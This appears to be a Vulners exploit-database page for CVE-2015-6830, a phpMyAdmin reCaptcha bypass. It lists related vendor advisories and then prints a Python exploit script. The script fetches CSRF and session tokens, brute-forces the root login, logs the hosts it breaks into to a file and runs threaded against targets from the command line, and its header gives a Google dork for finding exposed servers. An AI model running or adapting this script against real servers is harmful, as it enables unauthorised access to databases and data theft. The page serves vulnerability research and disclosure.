| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| phpMyAdmin -- reCaptcha bypass | 8 Sep 201500:00 | – | freebsd | |
| phpMyAdmin 4.3.x < 4.3.13.2 / 4.4.x < 4.4.14.1 reCaptcha Bypass (PMASA-2015-4) | 25 Feb 201600:00 | – | nessus | |
| Debian DSA-3382-1 : phpmyadmin - security update | 30 Oct 201500:00 | – | nessus | |
| Fedora 23 : phpMyAdmin-4.4.14.1-1.fc23 (2015-15384) | 21 Sep 201500:00 | – | nessus | |
| Fedora 22 : phpMyAdmin-4.4.14.1-1.fc22 (2015-15385) | 14 Sep 201500:00 | – | nessus | |
| Fedora 21 : phpMyAdmin-4.4.14.1-1.fc21 (2015-15386) | 14 Sep 201500:00 | – | nessus | |
| FreeBSD : phpMyAdmin -- reCaptcha bypass (3904f759-5659-11e5-a207-6805ca0b3d42) | 9 Sep 201500:00 | – | nessus | |
| openSUSE Security Update : phpMyAdmin (openSUSE-2015-629) | 6 Oct 201500:00 | – | nessus | |
| phpMyAdmin 4.3.x < 4.3.13.2 / 4.4.x < 4.4.14.1 reCaptcha Bypass (PMASA-2015-4) | 17 Sep 201500:00 | – | nessus | |
| CVE-2015-6830 | 19 Aug 202521:02 | – | circl |
"""
Exploit-Title: PHPMyAdmin 3.0 - Bruteforce Login Bypass
Author: Nikola Markovic ([email protected])
Date: 2023
Google-Dork: intext: phpMyAdmin
Vendor: https://www.phpmyadmin.net/
Version: >3.0 & 4.3.x before 4.3.13.2 and 4.4.x before 4.4.14.1
Tested on: win/linux/unix
Python-Version: 3.0
CVE : CVE-2015-6830
"""
import urllib.request
import urllib.parse
import urllib
import threading
import http.cookiejar
import re
import sys
def CheckLogin(target):
passwords = ["123"]
try:
for password in passwords:
print("Try Host: "+target+" with Combo: root/"+password+"!\n")
load_token = urllib.request.Request(target)
fetch_token = urllib.request.urlopen(load_token,timeout=2).read()
token = re.findall(r'name="token" value="([\w\.-]+)"',fetch_token.decode('utf-8')) # token fetching
session = re.findall(r'name="set_session" value="([\w\.-]+)"',fetch_token.decode('utf-8')) ## session token fetching
login_data = urllib.parse.urlencode({ 'pma_username': "root", 'pma_password': password,'set_session': session[0], 'token':token}) ## injecting payload to bruteforce
login = login_data.encode()
cookies = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookies))
do_it = opener.open(target,login,timeout=2)
check = do_it.read()
if b"index.php?route=/logout" in check:
f = open('bruted_pma','a')
f.write(target+" Bruted: root/"+password+"\n")
f.close()
except:
pass
if sys.argv[1]:
t = threading.Thread(target=CheckLogin,args=(str(sys.argv[1]),))
if threading.active_count() < 500:
t.start()
else:
t.start()
t.join()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation